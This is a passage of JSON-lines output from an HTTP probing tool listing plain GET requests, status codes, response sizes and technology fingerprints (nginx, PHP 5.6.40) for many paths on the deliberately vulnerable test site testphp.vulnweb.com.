categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/listproducts.php?cat=2\",\"time\":\"358.21704ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.033688099Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/listproducts.php?cat=3\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/listproducts.php?cat=3\",\"time\":\"349.9664ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.044677852Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/listproducts.php?cat=4\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/listproducts.php?cat=4\",\"time\":\"342.163804ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.106216094Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/login.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/login.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/login.php\",\"time\":\"359.424266ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.120764929Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/style.css\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/style.css\",\"time\":\"354.959021ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.119028675Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/privacy.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/privacy.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/privacy.php\",\"time\":\"348.485448ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.210157224Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/userinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/AJAX/userinfo.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/userinfo.php\",\"time\":\"343.491213ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.227327397Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/artists.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/artists.php\",\"time\":\"345.413369ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.28134075Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/cart.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/cart.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/cart.php\",\"time\":\"350.640993ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.290508457Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/categories.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/categories.php\",\"time\":\"352.349153ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.303529159Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/disclaimer.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/disclaimer.php\",\"time\":\"344.830507ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.337971736Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/guestbook.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/guestbook.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/guestbook.php\",\"time\":\"354.38209ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.408275757Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/index.php\",\"time\":\"340.26226ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.420798159Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/listproducts.php?cat=1\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/listproducts.php?cat=1\",\"time\":\"344.368512ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.466230501Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/listproducts.php?cat=2\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/listproducts.php?cat=2\",\"time\":\"347.899564ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.471391488Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/listproducts.php?cat=3\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/listproducts.php?cat=3\",\"time\":\"353.041646ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.49368471Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/listproducts.php?cat=4\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/listproducts.php?cat=4\",\"time\":\"351.77209ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.571435407Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/login.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/login.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/login.php\",\"time\":\"344.217376ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.624593304Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/style.css\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/style.css\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/style.css\",\"time\":\"346.675973ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.628074537Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/privacy.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/privacy.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/privacy.php\",\"time\":\"353.501533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.647726003Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/userinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/AJAX/userinfo.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/userinfo.php\",\"time\":\"355.284762ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.675257155Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/Posters\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/Posters\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/Posters\",\"time\":\"345.824424ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.85259117Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/cart.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/cart.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/cart.php\",\"time\":\"345.311717ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.866360894Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/artists.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/artists.php\",\"time\":\"346.684603ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.867863037Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/admin1.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/admin1.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/admin1.php\",\"time\":\"351.181417ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.913516748Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/categories.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/categories.php\",\"time\":\"343.523299ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.934351913Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/default.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/default.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/default.php\",\"time\":\"353.434813ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.949957698Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/guestbook.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/guestbook.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/guestbook.php\",\"time\":\"354.21661ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:22.956416666Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/disclaimer.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/disclaimer.php\",\"time\":\"353.092709ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.031009233Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/index\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/index\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/index\",\"time\":\"346.767616ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.082646966Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/index.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/index.php\",\"time\":\"349.970674ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.117686096Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/listproducts.php?cat=1\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=1\",\"time\":\"353.226129ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.118853076Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/listproducts.php?cat=2\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=2\",\"time\":\"349.77243ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.1661896Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/listproducts.php?cat=3\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=3\",\"time\":\"352.735846ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.170341967Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/login\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/login\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/login\",\"time\":\"338.442733ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.174802816Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/listproducts.php?cat=4\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/listproducts.php?cat=4\",\"time\":\"346.490964ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.25807422Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/login.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/login.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/login.php\",\"time\":\"348.559733ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.28007641Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php/privacy.php\",\"input\":\"http://testphp.vulnweb.com:80/categories.php/privacy.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/privacy.php\",\"time\":\"340.382437ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:23.331479356Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/categories.php1\",\"input\":\"http://testphp.vulnweb.com:80/categories.php1\",\"title\":\"404 Not 